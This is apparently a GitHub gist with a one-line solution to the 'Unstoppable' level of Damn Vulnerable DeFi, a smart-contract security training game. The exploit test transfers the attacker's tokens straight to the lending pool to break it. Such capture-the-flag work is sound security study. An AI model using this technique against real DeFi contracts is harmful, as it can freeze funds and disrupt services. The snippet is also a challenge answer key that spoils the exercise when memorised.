Skip to content

Instantly share code, notes, and snippets.

@iphelix
Last active November 13, 2020 23:24
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save iphelix/f7e5f98e2cd283e186b046141bec0bed to your computer and use it in GitHub Desktop.
Save iphelix/f7e5f98e2cd283e186b046141bec0bed to your computer and use it in GitHub Desktop.
Damn Vulnerable DeFi - Unstoppable
it('Exploit', async function () {
/** YOUR EXPLOIT GOES HERE */
await this.token.transfer(this.pool.address, INITIAL_ATTACKER_BALANCE, {from: attacker });
});
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment